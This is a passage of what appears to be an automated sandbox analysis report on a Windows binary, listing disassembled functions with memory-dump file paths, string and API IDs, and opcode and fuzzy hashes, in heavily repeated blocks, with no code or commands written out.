                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?}$z1}
                                    • API String ID: 0-3653690443
                                    • Opcode ID: 7367ec6a1dd05df7c2f7ef8ce5ff3e9940cc0817d53c2c9b5b81a5e8069d9660
                                    • Instruction ID: 8771296b8f2275fc240e28a0d8796c95e0c4da60fdfe661dd5c23e46942aada0
                                    • Opcode Fuzzy Hash: 7367ec6a1dd05df7c2f7ef8ce5ff3e9940cc0817d53c2c9b5b81a5e8069d9660
                                    • Instruction Fuzzy Hash: C8B219F36082009FE304AE2DEC8577ABBE9EB94720F1A493DE6C4C7744E63598458797
                                    Function 003D4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: 22951016080d118e49b59647bca2aba5cc329708c4f097eaf0697bca3760a84d
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: ED7223B3908B509BD716CF24D88076AB7E2BFD5310F5A8A1EF8A55B391D370DC419B82
                                    Function 003B5DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 6a0e46c6886b76fd6374c11bd7a8a35d444a90f0ca613f3250d7ef0a4f5d8590
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: CCA259B1C042688BEF1ACB54C8523FDB7B1FF45308F1942AAD6567BA82D7395E81CB50
                                    Function 003B4DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction ID: 32fad999743603c5d261c1d6f2a2ad0c2111d40b4ba0f54a009cdf6e0a3a516a
                                    • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction Fuzzy Hash: E5E1F231A083419FCB26DF28C8807EEB7E6EFC9304F45492DE6D99B691D7319845CB86
                                    Function 003B4868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction ID: 236ab5e35ae3767593380114eecb5c04f754946dc095d39aaaaee8438818567a
                                    • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction Fuzzy Hash: B6E1C431A083059FCB25CE18C8817EEB7E6EFC5314F15892DEA999B652D730EC45CB4A
                                    Function 003CE258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: UNC\
                                    • API String ID: 0-505053535
                                    • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction ID: 404753d99ce8a61013b9705e59fb06ce178efc44b68dc045f4b66976470f0a20
                                    • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction Fuzzy Hash: 10E15D71D042658FEB16CF19C884BBEBFE2AB85314F1A816DC4A4DF292D7358D46CB90
                                    Function 006E53C4 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *n2[
                                    • API String ID: 0-3175852641
                                    • Opcode ID: c588096cbf717afd6d0cbc6352e9492643000f71acfcaee2779dcd314ead5244
                                    • Instruction ID: 8999df9d7b8bcf000d50be94cd972995c671324850e022d170175f0b81b97b07
                                    • Opcode Fuzzy Hash: c588096cbf717afd6d0cbc6352e9492643000f71acfcaee2779dcd314ead5244
                                    • Instruction Fuzzy Hash: FC4144F3A182005BF7086D3DDD9977BBAD6DB94320F1A463DE785C7780E83988048246
                                    Function 0038E544 Relevance: .8, Instructions: 823COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction ID: 7079ae1c7db6c9655c774d284bbc311a7dfd26cfcca5f8bdbd74ebaf79d9175a
                                    • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction Fuzzy Hash: EE82F275900F448FD766CF29C880B92B7F1BF9A300F548A6ED9EA8BA51DB30B545CB50
                                    Function 003A8E78 Relevance: .6, Instructions: 649COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                    • Instruction ID: c3b8fb8426dd8d75a10b7cf9d2e2e47e144bcf1606ec812fa7521cc481c0e93e
                                    • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                    • Instruction Fuzzy Hash: 46429D746047418FC726CF19C094766BBE2FF9B310F298A6FC4869BB92D635E885CB50
                                    Function 003DAC28 Relevance: .5, Instructions: 501COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                    • Instruction ID: 9731e9eda763fb5381a51a1c3604ff21b308319f03d9910a01b13a60abb396bc
                                    • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                    • Instruction Fuzzy Hash: 8502F472E006268FCB12CF39D8906AFB7E6AF9A350F16831AE815B7751D770AD418790
                                    Function 003B98B8 Relevance: .5, Instructions: 482COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                    • Instruction ID: cff5a1550754f555f0e76a9c2486dc111c8cfad9b98b356f25bf9bc7f89363d5
                                    • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                    • Instruction Fuzzy Hash: E102F371A083058FDB16CF29C8803A9B7E1EFA5318F15C72EEB999B752D731E8858741
                                    Function 003A66C8 Relevance: .4, Instructions: 418COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                    • Instruction ID: a154c9902ebc5bf578b327aeff9b63a7a3c73b2a4c394a18572a8ec10cc65dfb
                                    • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                    • Instruction Fuzzy Hash: 0DF16C6210C6E14BC71E9A1584B08BDBFD29BAA201F0E86ADFDD60F393D924D901DB61
                                    Function 003EB308 Relevance: .4, Instructions: 415COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
